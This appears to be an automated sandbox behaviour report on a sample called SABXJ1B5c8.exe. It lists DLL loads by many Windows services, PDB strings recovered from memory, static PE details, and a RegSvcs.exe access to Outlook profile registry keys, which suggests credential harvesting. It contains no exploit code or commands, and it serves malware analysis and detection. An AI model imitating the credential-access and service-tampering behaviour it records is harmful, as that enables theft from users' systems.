            Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dllJump to behavior
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dllJump to behavior
            Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
            Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
            Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
            Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
            Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: SABXJ1B5c8.exeStatic file information: File size 1566208 > 1048576
            Source: SABXJ1B5c8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1561293289.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: plugin-container.pdb source: armsvc.exe, 00000002.00000003.2520947525.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2448751622.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
            Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.2.dr
            Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2505901701.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: private_browsing.pdb source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb source: OcPubMgr.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2136445285.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2118045779.0000000001F40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: private_browsing.pdbp source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.2.dr
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
            Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OcPubMgr.exe.2.dr
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
            Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: updater.pdb source: armsvc.exe, 00000002.00000003.2547468354.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
            Source: msiexec.exe.0.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
            Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
